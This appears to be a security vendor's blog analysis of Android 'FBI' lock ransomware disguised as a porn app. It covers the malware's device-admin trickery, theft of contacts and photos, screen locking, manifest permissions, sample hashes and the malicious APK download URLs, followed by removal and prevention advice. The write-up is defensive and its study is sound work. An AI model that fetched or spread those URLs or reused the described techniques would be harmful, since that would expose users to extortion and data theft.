We have all read about the cryptolocker malware that encrypts the victim’s data and then ask for ransom money for helping to decrypt the data; We have also heard many real-life stories where politicians and mafia have blackmailed people in order to “persuade” them into doing something. If you think that you are safe from blackmailing because you are neither a politician or nor in organized crime, think again. CyphortLabs started seeing Android malware that combines blackmail tactics into ransomware design in order to extort money out of you. Back in July this year, an android ransomware named FBI/Lock started to emerge . CyphortLabs analyzed two samples which we believed to be a new variant of this family.
This article shares some findings from our analyses of two such samples:
The following are the samples analyzed:
MD5 Source url
bd4ed8b3b5d37f34fb63ce2798c585e9 http://kjkobll.girlamus18.com/p1/pornvideo.apk
1c2c8894ab12a38b7420c7e04ed690f3 http://vfaywnaul.yagirls18.us/pornvideo.apk
What is it about?
The apps poses as a porn application. It displays the following videos which entices the user and thinks that he just installed a porn app.
But, it isn’t the case. After a few seconds, it will eventually display the following on your screen from “The FBI” saying that your phone is locked for containing pornographic materials with children which violates the law. To scare you more, it threatens that your face is captured with evidences of violation and that it is now uploaded to FBI Datacenter. In order for you to be clear of this violation, it ask you to pay a penalty of $500 within 3 days. It instructs you to pay through Moneypak.
Worse is, the above message will remain and will take over your whole screen even if you press home or exit which makes your phone unusable. It also presents evidences for violating the law with your phone details and your picture with it if exist.
Upon installation, it will ask the user to install it as a device administrator. This will make the malware harder to remove as you will need to remove it in device administrators before you can uninstall or delete the app.
When you cancel, it will send an intent that will display again the device administrator activation forcing you to it.
It also ask for permission to encrypt data. Such that, when you try to disable the device administrator it has another trick that returns a string that says all your data will be reset.
Although it has some code that encrypts and decrypts data, that function doesn’t seem to be called elsewhere. This likely means the malware is still under development and that it is going in the direction of being the cryptolocker of android. It uses a simple AES encryption which is way simpler than the cryptolocker of windows using asymmetric encryption. Also the AES key is hardcoded in the app which can be easily reversed.
What is happening on the background?
The OnCreate() method of the Main activity will retrieve contacts and post it to its CnC server. For these 2 samples, it will post it to the following servers:
It also retrieve the following details:
- IMEI
- Network information
- Phone information and model
- Country
It will also capture your picture by activating the front face camera which it saved under the folder CameraData777.
How does it lock your phone?
It registers a background service that continuously locks your screen via WebView. First, it sets an alarm of 30 seconds which will activate the service that locks your screen. That 30 second window is probably to make you think the phone is not doing any abnormal activity. After that 30 seconds, it launches the service in which it start a WebView layout which enables the app to load HTML page from the app without calling the browser. The service will load a local html page found on the assets folder named index.html.
Suspicious Manifest
This app declares a lot of dangerous permissions.
android.permission.READ_EXTERNAL_STORAGE
android.permission.RECEIVE_BOOT_COMPLETED
android.permission.INTERNET
android.permission.SYSTEM_ALERT_WINDOW
android.permission.ACCESS_NETWORK_STATE
android.permission.WAKE_LOCK
android.permission.GET_TASKS
android.permission.WRITE_SETTINGS
android.permission.CAMERA
android.permission.READ_PHONE_STATE
android.permission.WRITE_EXTERNAL_STORAGE
android.permission.READ_CONTACTS
android.permission.GET_ACCOUNTS
The SYSTEM_ALERT_WINDOW permission will allow the application to show system-alert window which can take over your screen. This is an early clue that it is a ransomware. RECEIVE_BOOT_COMPLETED enables the app to start on boot.
It also uses random names for its classes and has an autostart receiver.
What can you do if you are infected with this ransomware?
The normal uninstall and delete doesn’t work for this kind of app because your phone is locked and it is installed as device administrator. It requires that you restart your phone in safe mode. By restarting in safe mode, only the basic apps gets started. Go to Security Settings and locate the Device Administrator page. Remove the malware app from device administrators. Now you can uninstall the app and reboot your phone in normal mode.
Key Takeaways
Given that a lot of cybercrimes are following the money, it is a matter of time to see ransomware like cryptolocker to go from targeting Windows users to targeting Mac users, and to go from desktop to smartphones. However, this style of malware that combines blackmail tactics into ransomware design represents a more significant advancement in malware threat, which we refer to as “ransommail” malware. Several features of this malware are worth noting:
-It is a ransomware in that it holds the victim’s reputation for ransom
-It is blackmail in that it threatens the victim with the legal consequence of viewing porn
-It is a different kind of social engineering attack in that it exploits human vulnerability – curiosity and pride for reputation
-It combines fraudulent representation (being from FBI) with privacy-invasion means on the smart phone (captured personal identification information and photograph) in the blackmail act
Given the increasing population of Android phone users, we are abound to see more of such malware attacks. Users should be careful to only download mobile apps from trusted apps stores, and watch what their apps are doing on their phones.
Users are advised to:
- Do not install apps from untrusted sources. It is preferably safer to install apps from known reputable sources like the Google Play Store.
- Have certain level of protection. We all know that antivirus softwares cannot catch all the bad stuff but having antivirus installed is much better than having no level of protection at all.
- Monitor your running apps and processes. Most of the time, a normal user won’t monitor the running apps in his/her device but you might find something in there that you think shouldn’t be running and probably malware. A quick google search of the app name or the package name of the app installed will give you a hint if its bad or not.
- Do not install apps as device administrators unless you are sure they are clean and safe.
- Pay attention to permissions. When you install a simple app which you think that has no camera functions, retrieving contacts or access to SMS but asks for such permissions, that is already a red flag.
I would like to thank Fengmin Gong and the rest of CyphortLabs team for helping me with this report.
The post Ransommail: Ransomware Mobile Twist With Blackmail appeared first on Cyphort.